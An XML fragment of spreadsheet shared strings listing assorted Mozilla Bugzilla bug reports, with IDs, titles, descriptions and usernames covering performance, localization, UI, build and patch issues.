  <si>
    <t>CORE-79060</t>
  </si>
  <si>
    <t>Persisting size and position 5 times upon dialog opening</t>
  </si>
  <si>
    <t>1.4% of the time opening a blank dialog is spent in 5 calls to 
sXULWindow::PersistPositionAndSize.  Not that that's a lot but why 5 times?  
Why at all on window opening?</t>
  </si>
  <si>
    <t>FIREFOX-376008</t>
  </si>
  <si>
    <t>bookmarks html import/export needs to move to /browser</t>
  </si>
  <si>
    <t>it relies on /browser code such as the microsummary service (or will soon enough).</t>
  </si>
  <si>
    <t>CORE-423401</t>
  </si>
  <si>
    <t>Please use a local variable and copy the string once</t>
  </si>
  <si>
    <t>the current code does pointer work on a string which should be local until it's done.
it's also doing Append the first time instead of some flavor of Assign. nsPrintfCString might be useful...</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-183538</t>
  </si>
  <si>
    <t>Blue Coat Proxy server sends two Content-Type HTTP headers and causes us to not feed byte ranges to Acrobat for PDFs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2.1) Gecko/20021130
There is a certain class of PDF files that is triggering a very very serious
issue in Mozilla (can also repo in NS 7).   This class of files (of which the
test file above is just one example) often issue a byte range request very quickly
after the document opens.  (The above example is a file that opens with
Thumbnails ... to get the thumbnails Acrobat turns around an issues a pretty
quick byte ranges request ... just an example.)
In these circumstances  a very very terrible thing happens:
1 - Acrobat tells Mozilla to issue the byte range requests.  Mozilla complies
(can see the requests in a Windump log ... which I will put in the attachements). 
2 - The server downloads the requested ranges (which I can also see in the
windump log).
3 - Mozilla does not give us all of the ranges  (I can see this because
I am logging all of the calls to NPP_Write ... saving the offset and length
of the data.)
4 - Because Acrobat requested the data already and it needs it
it will hang (and hang mozilla) for five minutes until it times
out ... and then usually gives an error depending on what feature
it was waiting for data for.
YIKES!    
Unfortunately this is a very very serious issue. 
Reproducible: Always
Steps to Reproduce:
1. Install Acrobat 5
2. Go to the above URL in mozilla
Actual Results:  
3. HANG in acrobat and mozilla ... wait five minutes or kill the apps
Expected Results:  
Displayed the PDF file.
Two attachments:
1 - The windump log showing the HTTP conversation
2 - My dump of what our Acrobat plug-in NPPDF32.dll gets
passed via NPP_Write  (you can do something similar on your end
or I can give you my test plug-in to try ... just let me know).</t>
  </si>
  <si>
    <t>lmcquarr</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-818306</t>
  </si>
  <si>
    <t>Remove all other languages that are not being supported</t>
  </si>
  <si>
    <t>First run experience as well as settings -&gt; language is showing arabic English (US) French and Chinese.
We should be showing English Brazilian Portuguese and Latin America Spanish at the very least.
Note: I can't seem to find a bug for this so I am creating one and marking as a basecamp blocker because we can't ship with the current language selections.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-495731</t>
  </si>
  <si>
    <t>Remove shortcut editor related files</t>
  </si>
  <si>
    <t>Since we don't have a plan for the built-in shortcut editor we should remove it entirely. The properties file is being translated for l10n which is a waste of time. All other code was removed from the actual application.</t>
  </si>
  <si>
    <t>CORE-44623</t>
  </si>
  <si>
    <t>JS should implement String.prototype.localeCompare</t>
  </si>
  <si>
    <t>(ECMA 3 Section 15.5.4.9)</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-263304</t>
  </si>
  <si>
    <t>The Address Book doesn't show the LDAP-field labeledURI as Website</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de-DE rv:1.7) Gecko/20040917 Firefox/0.9.3
Build Identifier: Mozilla Thunderbird 0.8 (20040913)
I have an LDAP server which contains some inetOrgPerson records. When I look
at them using Mozilla Thunderbird's Address Book it doesn't show die LDAP-field
labeledURI. There's nothing shown in the field 'Website' in the Address Card.
Reproducible: Always
Steps to Reproduce:
1. Create new Directory Server entry to an LDAP server which contains
inetOrgPerson entries
2. Search for one of these entries where the field labeledURI is set
3. Open the entry
4. Click on Address
Actual Results:  
The two Website fields are empty.
Expected Results:  
The second Website field (the every last text field) should contain the value
of the field labeledURI.
The schema inetOrgPerson as of RFC 2798 contains a field labeledURI. Since
Thunderbird respects the other fields (cn sn givenName st title ...) it
should respect the field labeledURI as well.</t>
  </si>
  <si>
    <t>joshgeenen+bugzilla</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-325873</t>
  </si>
  <si>
    <t>Downloading</t>
  </si>
  <si>
    <t>[10.4] Camino should set the kMDItemWhereFroms attribute on downloaded files</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051229 Camino/1.0b2
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051229 Camino/1.0b2
When Camino downloads a file to disk on Mac OSX Tiger it should set the kMDItemWhereFroms attribute on the file to the url the file was downloaded from in the same way as Safari does it.
Reproducible: Always
Steps to Reproduce:
1. Download a file
2. Reveal the file in the finder
3. Right click on the file and select Get Info
4. In the More Info part of the window there should be a field called Where From: containing the url the file was downloaded from. Now there isn't</t>
  </si>
  <si>
    <t>beque</t>
  </si>
  <si>
    <t>CORE-389873</t>
  </si>
  <si>
    <t>GTK accessibility make rendering of large file list pages slow busy freezing all UI</t>
  </si>
  <si>
    <t>When in recent trunk builds accessibility started working again I noticed that</t>
  </si>
  <si>
    <t>NSS-326963</t>
  </si>
  <si>
    <t>Interoperability test with apache/mod_ssl: tstclnt produces: assertion failure: secmod_PrivateModuleCount == 0</t>
  </si>
  <si>
    <t>Getting the assertion when configure server to request client auth for a directory access. Server global zone is configured to request client cert.
See attached files for details.
It looks like one reference is left to sid-&gt;localCert after     SSL_ClearSessionCache() function call.</t>
  </si>
  <si>
    <t>CORE-659729</t>
  </si>
  <si>
    <t>Add global value numbering to IonMonkey</t>
  </si>
  <si>
    <t>This is a tracking bug for adding GVN to IonMonkey.
The current plan is to implement the algorithm from SCC-Based Value Numbering by Cooper and Simpson as a first pass. A hash-based value algorithm may be implemented as well for the purposes of benchmarking.</t>
  </si>
  <si>
    <t>rpearl</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-494695</t>
  </si>
  <si>
    <t>IsSpecialXHTMLTag warning: comparison between signed and unsigned</t>
  </si>
  <si>
    <t>embedding/components/webbrowserpersist/src/nsWebBrowserPersist.cpp: In function â€˜PRBool IsSpecialXHTMLTag(nsIDOMNode*)â€™:
embedding/components/webbrowserpersist/src/nsWebBrowserPersist.cpp:3902: warning: comparison between signed and unsigned integer expressions</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-514728</t>
  </si>
  <si>
    <t>NS Change for mozilla-srbija.org</t>
  </si>
  <si>
    <t>Hi I need someone to point mozilla-srbija.org domain to a nameservers below:
ns1.diskusije.org
ns2.diskusije.org
Please I need this ASAP. Thanks in advance!</t>
  </si>
  <si>
    <t>themilossh</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-340826</t>
  </si>
  <si>
    <t>When I create a new event all options are listed in Dutch except the categories.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 nl rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.2 nl rv:1.9a1) Gecko/20060507 Mozilla Sunbird/0.3a2
In Dutch we call new event - nieuwe gebeurtenis.
It is not a real problem. Just to inform you.
Reproducible: Always
Steps to Reproduce:
1. Install Mozilla Sunbird/0.3a2
2. Create a new event
Actual Results:  
All options in the drop down menu are in English. Like: Anniversary Birthday Business Calls and so on.
Expected Results:  
That all options where in Dutch.
The previous version of Mozilla Sunbird was English. Recently I've updated the application into the latest Dutch version.
You can see the actions I took for the installation in Bug 340488.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-104060</t>
  </si>
  <si>
    <t>ftang's to be check in meta list</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-294201</t>
  </si>
  <si>
    <t>americanexpress.com -- menus too tall (fill the window)</t>
  </si>
  <si>
    <t>The background and info are rendered seperately.
Background is hown on top of page text below the background.
Build is 20050513.</t>
  </si>
  <si>
    <t>carsten424</t>
  </si>
  <si>
    <t>MOZILLA.ORG-425816</t>
  </si>
  <si>
    <t>laura needs svn access to ./projects/sumo/</t>
  </si>
  <si>
    <t>Could we get Laura access to sumo in SVN?  /projects/sumo/ thanks.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-395094</t>
  </si>
  <si>
    <t>unable to build with the Windows Try server cvs problems?</t>
  </si>
  <si>
    <t>unable to build with the Windows Try server
cvs [checkout aborted]: could not chdir to mozilla/build/autoconf: Permission denied
make: *** No rule to make target `/cygdrive/d/buildbot/sendchange-slave/sendchange-win32/mozilla/.mozconfig.mk'.  Stop.
Build Error Log
tinderbox: tree: MozillaTry
tinderbox: builddate: 1189029245
tinderbox: status: busted
tinderbox: build: Try server win32 builder
tinderbox: errorparser: unix
tinderbox: binaryurl: 
tinderbox: logcompression: bzip2
tinderbox: logencoding: base64
tinderbox: END
BUILD NUMBER: 83
REQUESTED BY: sspitzer@mozilla.com
REASON: No description given.
mozilla\build - The directory is not empty.
mozilla\objdir\layout\base - The process cannot access the file because it is being used by another process.
mozilla\objdir\layout - The process cannot access the file because it is being used by another process.
mozilla\objdir - The process cannot access the file because it is being used by another process.
The process cannot access the file because it is being used by another process.
cvs checkout: warning: failed to open /home/cltbld/.cvspass for reading: No such file or directory
U mozilla/client.mk
cvs checkout: warning: failed to open /home/cltbld/.cvspass for reading: No such file or directory
cvs [checkout aborted]: could not chdir to mozilla/build/autoconf: Permission denied
/bin/sh: mozilla/build/autoconf/mozconfig2client-mk: No such file or directory
client.mk:521: /cygdrive/d/buildbot/sendchange-slave/sendchange-win32/mozilla/.mozconfig.mk: No such file or directory
make: *** No rule to make target `/cygdrive/d/buildbot/sendchange-slave/sendchange-win32/mozilla/.mozconfig.mk'.  Stop.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-471878</t>
  </si>
  <si>
    <t>Long descriptions to a list preference will only show one line listboxes</t>
  </si>
  <si>
    <t>Created attachment 355127
min height on listboxes
The fix is to simply add some min-height to the listboxen.</t>
  </si>
  <si>
    <t>glenjamin+bmo</t>
  </si>
  <si>
    <t>TESTOPIA-383046</t>
  </si>
  <si>
    <t>The Test Plan Interface is Over-Loaded with Too Many Items</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: 
As a rule - when you have too many objects / items on the same page it becomes difficult or almost impossible to use it efficiently.
I propose to create a Short Test Plan interface (or to be customizable) which will not contain the following items:
1. Categories &amp; Tags - Leave only the Builds
2. Test Cases - I propose to remove the Default Tester the Category and the Jump to Page line (it will be defaulted and retrieved from customization)
3. Test Runs - Remove the Jump to Page line (it will be defaulted and retrieved from customization)
4. Reports - Will be removed completely and will be run from another option.  This way several reports could be run at the same time
5. Attributes - Will be removed completely 
Reproducible: Always
Steps to Reproduce:
N/A
Actual Results:  
N/A
N/A</t>
  </si>
  <si>
    <t>jacob.zilberman</t>
  </si>
  <si>
    <t>CALENDAR-163858</t>
  </si>
  <si>
    <t>Unifinder selectionbar colors do not match with theme</t>
  </si>
  <si>
    <t>From bug 160732 reported by alge@samsen.com:
The Calendar unifinder(sidebar) uses a lightblue color for the selectionbar.
While I like that color it doesn't match with any other selections for that 
theme in Mozilla (mail/news sidebar..)
Is there any objection to removing the selection colors from the calendar.css 
and use the colors provided by Mozilla/listbox?
See also: http://alge.nlc.no/~alge/cal.png (current situation)</t>
  </si>
  <si>
    <t>CORE-406568</t>
  </si>
  <si>
    <t>{inc} ElPais.com incorrect positioned link boxes after nested floats</t>
  </si>
  <si>
    <t>Created attachment 291201
screenshot
Midway down the page an horizontal block contains multiple (nested) floats and some small blocks of links 'Ver mÃ¡s vÃ­deos' 'Anterior' 'siguiente' and a larger list of 'sports' links on the right. The boxes have a blue background. Those small links are place on top of the main box where they should be placed at the bottom (with position:absolute bottom:xxpx)
regression: (hourly builds test with OS X)
20071129_1803 build fails
20071129_1431 build works
http://bonsai.mozilla.org/cvsquery.cgi?module=PhoenixTinderbox&amp;date=explicit&amp;mindate=1196375460&amp;maxdate=1196388179
--&gt; Bug 320378.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-339529</t>
  </si>
  <si>
    <t>wiki.mozilla.org's spam blacklist doesn't work anymore</t>
  </si>
  <si>
    <t>I added a site (buddyprofile.com) to wiki.m.o but still changes show up with that link in it.
addition to the blacklist (may 25):
http://wiki.mozilla.org/index.php?title=Spam_blacklist&amp;diff=26640&amp;oldid=26349
still getting used in spam (may 28):
http://wiki.mozilla.org/index.php?title=XSLT_PI_Parameters&amp;curid=16129&amp;diff=26817&amp;oldid=22872</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-845227</t>
  </si>
  <si>
    <t>Gaia::Build</t>
  </si>
  <si>
    <t>Remove various app folders like dogfood_apps showcase_apps when the app customization is ready</t>
  </si>
  <si>
    <t>When the app customization in Bug 838098 is ready whether we could remove all  the apps under test_apps/ showcase_apps/ and dogfood_apps/ etc. and rely on the app customization entirely.
This might affect the build process of our partners so I file this bug to gather your opinions on this.
Thanks.</t>
  </si>
  <si>
    <t>yurenju</t>
  </si>
  <si>
    <t>left.lu</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-196416</t>
  </si>
  <si>
    <t>2003-03-07-07 Build Broken</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.0.1) Gecko/20030306 Camino/0.7
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.0.1) Gecko/20030306 Camino/0.7
I downloaded the 2003-03-07-07 build from
ftp.mozilla.org/pub/camino/nightly/latest and when I mount the dmg I noticed
that the camino icon isn't on the app and when I launch the app from my desktop
I get an unexpectedly quit (error 1000)
Reproducible: Always
Steps to Reproduce:
1. ftp.mozilla.org/pub/camino/nightly/latest or 2003-03-07-07
2. uncomopress file
3. mount dmg
4. copy app to desktop
5. execute the app
Actual Results:  
Error message unexpectedly quit error 1000)
Expected Results:  
The browser should launch</t>
  </si>
  <si>
    <t>brianlee</t>
  </si>
  <si>
    <t>BUGZILLA-258515</t>
  </si>
  <si>
    <t>Errors when accessing Bugzilla over IPv6</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040714 Firefox/0.8
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040714 Firefox/0.8
When I access a dual-stack server running Apache 2 with Bugzilla 2.18.0_rc2
using the IPv6 address of the server I get an error when I try and log in. It
all works OK with IPv4.
Reproducible: Always
Steps to Reproduce:
1. https://my.ipv6.address/bugzilla/
2. Log in
3. See error.
Actual Results:  
index.cgi: DBD::mysql::db selectrow_array failed: called with 4 bind variables
when 3 are needed [for statement ``SELECT profiles.userid profiles.disabledtext
FROM logincookies profiles WHERE logincookies.cookie=? AND  
logincookies.userid=profiles.userid AND   logincookies.userid=? AND  
(logincookies.ipaddr=?)'']) at Bugzilla/Auth/Cookie.pm line 67
index.cgi: \tBugzilla::Auth::Cookie::authenticate('Bugzilla::Auth::Cookie'27)
called at Bugzilla/Auth/CGI.pm line 104
index.cgi: \tBugzilla::Auth::CGI::login('Bugzilla::Auth::CGI'0) called at
Bugzilla.pm line 74
index.cgi: \tBugzilla::login('Bugzilla'0) called at
/var/www/localhost/htdocs/bugzilla/index.cgi line 41
Expected Results:  
Logged me in as it does with IPv4.</t>
  </si>
  <si>
    <t>calum.bugzillabugs</t>
  </si>
  <si>
    <t>CORE-326594</t>
  </si>
  <si>
    <t>Consider using backtrace() for Unix stack traces</t>
  </si>
  <si>
    <t>There's some work in bug 323853 for using backtrace() for Unix stack traces.  It needs some further work (to handle unlimited stack depth) and perhaps some work on getting the tools we have that deal with stack traces to deal with its output.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-370927</t>
  </si>
  <si>
    <t>Skip default browser prompt on first launch</t>
  </si>
  <si>
    <t>This may be a crazy idea but since the issue of hammering the user with too many things at first launch came up: I think we should consider skipping the default browser prompt for the very first launch.
I hear about this thing called Camino it's supposed to be cool so I download it fire it up and bam the first thing I get is a dialog asking if I am ready to commit to using Camino forever. How could I possibly know? I haven't used it yet.
Yes it would be a bit more work for someone who is installing Camino on their second machine but I think that's a worthwhile tradeoff--especially since those users are probably going to go right into prefs and tweak them to match the their usual prefs anyway. If we really wanted to we could perhaps show it on first quit (as a Now that you've seen how awesome Camino is do you want to keep it? sort of thing) but that might be more annoying than worthwhile.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-466838</t>
  </si>
  <si>
    <t>eo / Esperanto</t>
  </si>
  <si>
    <t>change Le Monde diplomatique en espÃ©ranto to Le Monde diplomatique en Esperanto (no accent)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.17) Gecko/20080827 Iceweasel/2.0.0.17 (Debian-2.0.0.17-0etch1) FirePHP/0.2.1
Build Identifier: change Le Monde diplomatique en espÃ©ranto to Le Monde diplomatique en Esperanto on the Getting Started page
there's no accent in esperanto !
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>etrapani</t>
  </si>
  <si>
    <t>SEAMONKEY-416564</t>
  </si>
  <si>
    <t>ctrl-z on any xul page results in bookmarks JS exception aTarget is null in onDragRemoveFeedBack</t>
  </si>
  <si>
    <t>Any any xul page (the URL field is an empty xul page) hitting ctrl-z results in:
[Exception... '[JavaScript Error: aTarget is null {file: chrome://communicator/content/bookmarks/bookmarksMenu.js line: 707}]' when calling method: [nsIController::doCommand]  nsresult: 0x80570021 (NS_ERROR_XPC_JAVASCRIPT_ERROR_WITH_DETAILS)  location:   data: yes]
onDragRemoveFeedback is being called from BookmarksMenuController.doCommand where aCommand is cmd_undo.  This bug means we'll throw the exception once bug 416561 lands although the test will still pass.</t>
  </si>
  <si>
    <t>FIREFOX-328821</t>
  </si>
  <si>
    <t>Firefox update restores unwanted search engines.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
If I remove search engines they come back when I update firefox.
Reproducible: Always
Steps to Reproduce:
1. Remove useless search engines like Yahoo or Answers.com
2. Update Firefox
3. profit
Actual Results:  
Useless search engines come back.
Expected Results:  
Useless search engines should not come back.</t>
  </si>
  <si>
    <t>abadaba</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-352126</t>
  </si>
  <si>
    <t>[sk] Ship Firefox 2</t>
  </si>
  <si>
    <t>CORE-151133</t>
  </si>
  <si>
    <t>support nsIAccessibleText in MAI (Mozilla Atk Implementation)</t>
  </si>
  <si>
    <t>yinbolian</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-482686</t>
  </si>
  <si>
    <t>comm-central should pull Venkman from hg rather than CVS</t>
  </si>
  <si>
    <t>As in summary. Repo is at http://hg.mozilla.org/venkman/ . Let me know if there are problems it should be straightforward if the CVS import worked properly (which afaict it has but you never know).</t>
  </si>
  <si>
    <t>THUNDERBIRD-494632</t>
  </si>
  <si>
    <t>Fix a couple of wrong icons on Pinstripe's accountcentral</t>
  </si>
  <si>
    <t>Created attachment 379381
Fix
This should just be moving deck chairs on the Titanic since bug 489999 wants to remove all the duplicate the menuitems stuff from account central but if there's anything experience has taught me it's to not count patches before they've landed. And not to count on my ability to remember to do x if y doesn't land.
The patch is just the Qute icon for offline settings copied over to Pinstripe so we have a loose cat-5 cable instead of a lightbulb that no longer matches the statusbar offline icon and actually using manage-subscriptions.png for manage newsgroup subscriptions instead of reusing the empty mailbox that's also read mail and (unaccountably) manage filters.</t>
  </si>
  <si>
    <t>CORE-279378</t>
  </si>
  <si>
    <t>OBJECT should not be IsFocusable() when replaced by alternate content</t>
  </si>
  <si>
    <t>OBJECT should not be IsFocusable() when replaced by alternate content.
STEPS TO REPRODUCE:
1. Load URL
2. type ALT-g
ACTUAL RESULTS:
The  receives focus - TAB once to get to Font size.
EXPECTED RESULTS:
Font size  element should receive focus on ALT-g.
(Note that the URL depends on bug 81481 being fixed - testcase coming up
that does not have that dependency).</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-259084</t>
  </si>
  <si>
    <t>review comments on bug 173010 (protocol whitelist)</t>
  </si>
  <si>
    <t>spun off from bug 173010 comment 30.
 ------- Additional Comment #30 From Christian Biesinger (:bi)  2004-09-12 13:01
PDT  [reply] -------
(From update of attachment 158476)
Index: mozilla/uriloader/exthandler/nsExternalProtocolHandler.cpp
+    PRBool PromptForScheme(nsIURI *aURI nsACString
since aScheme seems to be an in parameter it should be const. but the scheme
could be gotten off the URI too why pass it here?
+  NS_ENSURE_ARG_POINTER(aNotificationCallbacks)
this should not be a runtime check since people who pass NULL to a get
function totally deserve what they get. also scripts can't do that.
+  return NS_OK       // don't fail when trying to set this
the comment seems to be pointless now that this function actually does
something
+static void *PR_CALLBACK handleExtProtoEvent(PLEvent *event)
+{
+  nsExtProtocolChannel *channel =
+      NS_STATIC_CAST(nsExtProtocolChannel* PL_GetEventOwner(event))
+
+  if (channel)
when can this be null? same in destroyExtProtoEvent
Two more issues:
1. the code asserts that it being a channel has
notificationCallbacks set and that it can get an nsIPrompt off
them...  but necko does not require to have an nsIPrompt available on the
notificationCallbacks this should be a NS_WARNING.
2. channels are supposed to try to get interfaces off the
loadgroup's notificationCallbacks if they can't find them on the channel</t>
  </si>
  <si>
    <t>TESTING-945273</t>
  </si>
  <si>
    <t>Update reftest manifests for pandaboards</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #900542 +++
Looks like a single unexpected pass has shown up on Cedar.</t>
  </si>
  <si>
    <t>dminor</t>
  </si>
  <si>
    <t>FIREFOX-519586</t>
  </si>
  <si>
    <t>anomaly on the back button texture when clicking the forward button</t>
  </si>
  <si>
    <t>Created attachment 403649
screenshot</t>
  </si>
  <si>
    <t>CORE-212798</t>
  </si>
  <si>
    <t>Make existing linux flashplayer.xpt (for scriptability) work with gcc 3.2 builds</t>
  </si>
  <si>
    <t>build ID: 2003071508 on Linux + Flash 6.0r79 and flashplayer.xpt.
Scriptability doesn't work anymore since Mozilla.org switched to GCC 3.2.3 as
mentioned in the release notes:
http://www.mozilla.org/releases/mozilla1.4/README.html#new-issues
about:buildconfig reports:
--disable-tests --enable-extensions=defaultirc --without-system-nspr
--without-system-jpeg --without-system-zlib --without-system-png
--without-system-mng --disable-debug --enable-optimize --disable-elf-dynstr-gc
--enable-optimize=-O2 --enable-crypto
I launched a debug build to see any error output but there's no debug info on
why scriptability doesn't work anymore:
 - hack not working well regression from bug 154206 ?
 - flashplayer.xpt needs to be updated ?
I deleted xpti.dat and a debug build didn't say whether or not flashplayer.xpt
was valid.
I couldn't find any bug report matching the release notes so I'm opening one
hoping this can be looked at.
This started generated some bug reports: bug  bug .</t>
  </si>
  <si>
    <t>TOOLKIT-470429</t>
  </si>
  <si>
    <t>nsPlacesDBFlush::onItemAdded should not sync if the item is a container</t>
  </si>
  <si>
    <t>we are doing more work than needed onItemAdded should sync places only if we create an uri item containers don't use moz_places table</t>
  </si>
  <si>
    <t>CORE-463348</t>
  </si>
  <si>
    <t>scroll position in  elements not being updated when keyboard is used to move between values</t>
  </si>
  <si>
    <t>STR:
1. Click on the OS field  element on this page
2. Type S
3. Press and hold the up arrow keys
Expected: the drop-down would jump down to the S section and show the focus on SunOS. As you hold up the elements would scroll when you get to the top of the list.
Actual: while the value of the  updates properly the focus doesn't follow so you can't see the value where it appears in the list.
This started happening a few days ago not sure exactly when. Thought it was just a bugzilla problem but figured I'd report it.</t>
  </si>
  <si>
    <t>FIREFOX-490130</t>
  </si>
  <si>
    <t>Tags list of Edit this Bookmark popup dialogue is not sorted correctly (wrong sorting: upper-case a to z lower-case a to z umlaute) [sort order not ordered alphabetically]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090424 Minefield/3.6a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090424 Minefield/3.6a1pre
The list of all tags (with checkboxes) that you get by toggling the Show all tags button inside the Edit this bookmark popup dialogue is not sorted correctly. Current sort order is upper-case a to z lower-case a to z then words that begin with upper-case umlauts finally lower-case umlauts. This is likely to confuse users who are looking for a specific tag in the list as that sort order doesn't make any sense at all in terms of usability. The dialogue should use at least use the same default sort order as in bookmarks Library &gt; Tags: just sort all tags alphabetically (while ignoring case and umlauts). Ideally umlauts should be sorted in as ae oe ue but that might be a localization issue to be dealt with seperately.
Reproducible: Always
Steps to Reproduce:
1. Have loads of tags with different sorts of initial letters: upper-case lower-case and German umlauts (Ã¤ Ã¶ Ã¼ = ae oe ue)
2. Open Edit this bookmark popup dialogue by clicking on yellow star
3. Click Show all tags button to toggle open the list of all tags (with checkboxes) in the dialogue
Actual Results:  
Tags in the list are sorted in a rather unexpected three-fold way that makes it unnecessary difficult to find the right tag (e.g. a tag named OEM Software might end up miles away from another tag named oem).
-- undesired sort order: --
upper-case a to z
lower-case a to z
upper-case umlauts a to z
lower-case umlauts a to z
Expected Results:  
At least use the same default sort order as in bookmarks Library &gt; Tags:
-- desired sort order: --
just sort all tags alphabetically (while ignoring case and umlauts).
Ideally umlauts should be sorted in as ae oe ue but that might be a localization issue to be dealt with seperately.
The effect of this can be quite annoying as (lower/upper-)case of a given tag is changed (edited) on the fly as you type. Say these are your tags in the wrong order as described in this bug:
OEM &lt;--
Opel
oem software
offer
often
Ã–sterreich
Ã¶sterreichisch
Next time you do tag-as-you-type and accidentally type oem instead of OEM FF will edit the tag's name on the fly OEM becomes oem (for all affected bookmarks) and thus moves to a completely different place in the (wrong) sort order:
Opel
oem &lt;--
oem software
offer
often
Ã–sterreich
Ã¶sterreichisch</t>
  </si>
  <si>
    <t>FIREFOX-517597</t>
  </si>
  <si>
    <t>waste fewer resources while a user only has one client active</t>
  </si>
  <si>
    <t>Created attachment 401553
force timers to 24 hours with a single client set up.
POC patch attached default to 24 hours between syncs for users with a single client.
With this we'll sync after each startup and then either manually or every 24 hours after that.  Manual syncs will bump the next sync to 24 hours out from then.
To do/consider:
* Store next sync time as a pref enforce 24 hours or manual syncs across restarts.
* Look at tracker-based sync calls to determine.
* Disable tab sync with a single client active.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-407883</t>
  </si>
  <si>
    <t>Fix Downloads window opening and focusing prefs logic (and names)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en-gb) AppleWebKit/523.10.3 (KHTML like Gecko) Version/3.0.4 Safari/523.10
Build Identifier: Version 2007112801 (2.0a1pre)
[I apologize if I have filed this before. I certainly can't find it on bugzilla.]
browser.download.progressDnldDialog.bringToFront controls whether the Download window comes to the front when a new download begins. Currently this works only some of the time:
1. Set browser.download.progressDnldDialog.bringToFront to false
2. Start Camino
3. Start a download. The Download window comes to the front.
4. Bring the browser window to the front and start another download. The Download window remains in the background
5. Bring the Download window forward and close it.
6. Start another download. The Download window comes to the front.
In other words the Download window remains in the background unless it has not yet been opened or the user has explicitly closed it.  IMO the Download window should never jump forward if the preference is set to false.
I believe the patch below fixes this. I apologize that it is untested I do not have a Camino checkout at the moment.
--- ProgressDlgController.mm	2007-12-11 10:53:55.000000000 +0000
+++ ProgressDlgController.mm.new	2007-12-11 10:55:34.000000000 +0000
@@ -53919 +53920 @@
 -(void)didStartDownload:(ProgressViewController*)progressDisplay
 {
-  if (![[self window] isVisible]) {
-    [self showWindow:nil] // make sure the window is visible
-  }
-  
   // a common cause of user confusion is the window being visible but behind other windows. They
   // have no idea the download was successful and click the link two or three times before
   // looking around to see what happened. We always want the download window to come to the
   // front on a new download (unless they set a user_pref)
   BOOL gotPref = NO
   BOOL bringToFront = [[PreferenceManager sharedInstance] getBooleanPref:browser.download.progressDnldDialog.bringToFront withSuccess:
-  if (gotPref &amp;&amp; bringToFront)
-    [[self window] makeKeyAndOrderFront:self]
+  if (gotPref &amp;&amp; bringToFront) {
+    if (![[self window] isVisible]) {
+      [self showWindow:nil] // make sure the window is visible
+    }
+    [[self window] makeKeyAndOrderFront:self]
+  }
+
   [self rebuildViews]
   [self setupDownloadTimer]
Reproducible: Always</t>
  </si>
  <si>
    <t>bdeb</t>
  </si>
  <si>
    <t>CORE-442806</t>
  </si>
  <si>
    <t>Use separate versioned caches for offline apps</t>
  </si>
  <si>
    <t>Created attachment 327508
v1
The HTML5 spec calls for separate versioned caches rather than one flat offline cache.  It ties all the loads for a given toplevel browsing context to a given version of the application cache.
The attached patch implements the following to that end:
* nsIOfflineCacheSession has been removed and replaced with nsIApplicationCache.
* Channels pick up the nsIApplicationCache they're associated with from the load group (which in turn gets it from the docshell).
* Because the caches are separate we were able to remove ownerships from the interface which simplifies things a lot.
* nsDOMOfflineResourceList.cpp is updated to work with these application cache objects.
A few things are left for followups which I'll file separately (this patch is getting big enough as it is):
* The UI doesn't pick up cache sizes correctly anymore
